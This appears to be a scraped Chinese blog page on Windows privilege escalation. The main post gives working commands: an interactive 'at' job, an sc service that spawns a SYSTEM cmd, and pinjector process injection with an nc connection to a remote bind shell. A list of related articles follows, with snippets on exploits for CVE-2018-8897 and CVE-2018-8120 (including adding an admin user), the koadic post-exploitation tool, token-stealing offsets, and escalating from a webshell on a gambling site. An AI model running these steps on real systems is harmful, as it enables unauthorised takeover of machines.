windows提权

  • PsExec
  • at
  • Process_Injector
  • sc

  • psexec

    当前用户是jh

    提权之后


    *at命令提权(适用于xp,2003)

    at 15:05 /interact cmd  


    sc

    创建服务(打开cmd命令窗口的服务)

        sc Create systemcmd binPath= "cmd /K start" type= own type= interact

    启动服务刚才创建的服务

        sc start systemcmd

    process_injector

    列出当前的所有进程

    pinjector.exe -l

    选择要提权成的用户,进行进程注入

    pinjector.exe -p 732 cmd 5555   #服务端实现进程注入
    nc -nv 10.10.10.19 5555    # 客户端连接服务端

    原文地址:http://blog.51cto.com/13155409/2154920

    时间: 2024-10-10 02:41:43

    windows提权的相关文章

    windows 提权 cve-2018-8897

    windows 提权 cve-2018-8897 影响范围:基本上是全版本 具体影响范围看详情:https://portal.msrc.microsoft.co … isory/CVE-2018-8897 http://www.o2oxy.cn/wp-content/uploads/2018/06/cve-2018-8897.rar 原文地址:https://www.cnblogs.com/liang2580/p/9157887.html

    2017-2018-2 20155315《网络对抗技术》免考五:Windows提权

    原理 使用metasploit使目标机成功回连之后,要进一步攻击就需要提升操作权限.对于版本较低的Windows系统,在回连的时候使用getsystem提权是可以成功的,但是对于更高的系统操作就会被拒绝.为了获得受害机器的完全权限,需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒. Metasploit有很多种后渗透方法,可以用于对目标机器的权限绕过,最终获取到系统权限. UAC 用户帐户控制(User Account Control, U

    windows提权之ftp提权

    windows提权之ftp提权 0,起因,由于前几天拿了一个菠菜站的webshell,但是只有iis权限,执行无法创建用户等操作,更无法对整个服务器进行控制了,于是此时便需要提权了,对于一个刚刚入门的小白来说,此刻真正意识到了提权的重要性,于是便开始学习提取相关知识,以拿下该菠菜的站点. 提权前的准备工作 1,通常来说,不同的脚本所处的权限是不一样的.这就意味着,如果该站点支持权限更高的脚本,我们可以上传该权限更高的脚本的大马,进而拿到更高的权限. asp/php 通常为匿名权限(网络服务权限)

    windows提权方法总结

    windwos提权方法分为两大块: 一.系统漏洞 二.第三方软件漏洞 系统信息泄露和配置不当都可能导致系统被入侵,下面总结是一些常用的windows提权方式. 1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限) 2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接) 3,PCANYWHRER提权(也是远程客户端软件,下载安装目录的CIF文件进行破解) 4,SAM提权(SAM系统帐户,通常需要下载临时

    [转帖]「白帽黑客成长记」Windows提权基本原理(上)

    https://www.cnblogs.com/ichunqiu/p/10949592.html 我们通常认为配置得当的Windows是安全的,事实真的是这样吗?今天让我们跟随本文作者一起深入了解Windows操作系统的黑暗角落,看看是否能得到SYSTEM权限. 作者将使用不同版本的Windows来强调任何可能存在的命令行差异,请牢记因为不同的操作系统和版本差异会在命令行中显现,作者试图构造本教程,以便它适用于Windows提权的最普遍的方式. 注:文章篇幅较长,阅读用时约10分钟. 必要文档补

    Windows提权列表

    漏洞列表 #Security Bulletin #KB #Description #Operating System CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows 10/8.1/7/2016/2010/2008) MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP) MS16-135 [KB3199

    CVE-2018-8120 Microsoft Windows提权漏洞 Exp

    CVE-2018-8120 Windows LPE exploit Supports both x32 and x64. Tested on: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 x64. Usage CVE-2018-8120 exploit Usage: exp.exe command Example: exp.exe "net user admin admin /ad" https://githu

    windows提权辅助工具koadic

    项目地址:https://github.com/zerosum0x0/koadic ┌─[[email protected]]─[/sch01ar] └──? #git clone https://github.com/zerosum0x0/koadic 下载后打开并安装所需的包 ┌─[[email protected]]─[/sch01ar/koadic] └──? #pip install -r requirements.txt 安装完成后启动程序 ┌─[[email protected]]

    windows 提权

    1. 使用token PROCESS 结构中的Token 偏移,在x86 系统中偏移0xf8 进程由双链表组成,通过_LIST_ENTRY 来链接,通过循环进程偏移0xb8 来获取所有进程偏移0xb8的地址 kd> !process 0 0 system PROCESS 860dac78 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 DirBase: 00185000 ObjectTable: 8c001bb8 HandleCou